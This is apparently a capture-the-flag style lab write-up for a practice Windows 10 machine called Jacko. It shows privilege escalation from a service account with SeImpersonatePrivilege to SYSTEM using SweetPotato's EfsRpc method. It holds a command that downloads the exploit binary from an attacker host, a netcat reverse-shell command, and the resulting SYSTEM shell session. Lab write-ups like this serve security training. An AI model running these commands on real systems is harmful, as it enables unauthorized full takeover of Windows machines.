SweetPotato
The compromised tony account has SeImpersonatePrivilege set, which makes the target system vulnerable to the potato exploits. Given the target system is Microsoft Windows 10 Pro, I will be using SweetPotato
/Practice/Jacko/5-Privilege_Escalation/attachments/{56C0D087-9EB8-4C61-B3E4-D94858DC2190}.png)
SweetPotato is a collection of various native windows privilege escalation techniques from service accounts to system. it has been created by @ethicalchaos and includes:
- RottenPotato
- Weaponized JuciyPotato with BITS WinRM discovery
- PrintSpoofer discovery and original exploit
- EfsRpc built on EfsPotato
- PetitPotam
Exploit
/Practice/Jacko/5-Privilege_Escalation/attachments/{BDD8A95A-966B-446F-AD40-F3EB020F5087}.png)
Exploit binary is available online
Exploitation
PS C:\tmp> iwr -Uri http://192.168.45.192/SweetPotato.exe -OutFile C:\tmp\SweetPotato.exeDelivery complete
PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -p "C:\Windows\temp\nc.exe" -e EfsRpc -a "192.168.45.192 1234 -e powershell"
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\Windows\temp\nc.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/7b9a765a-8471-42f9-a2c7-68abd56b8c57/\7b9a765a-8471-42f9-a2c7-68abd56b8c57\7b9a765a-8471-42f9-a2c7-68abd56b8c57
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!The command above uses the EFSRPC method, which targets the MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/jacko]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.236.66] 49829
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
jacko
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.236.66
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.236.254System level compromise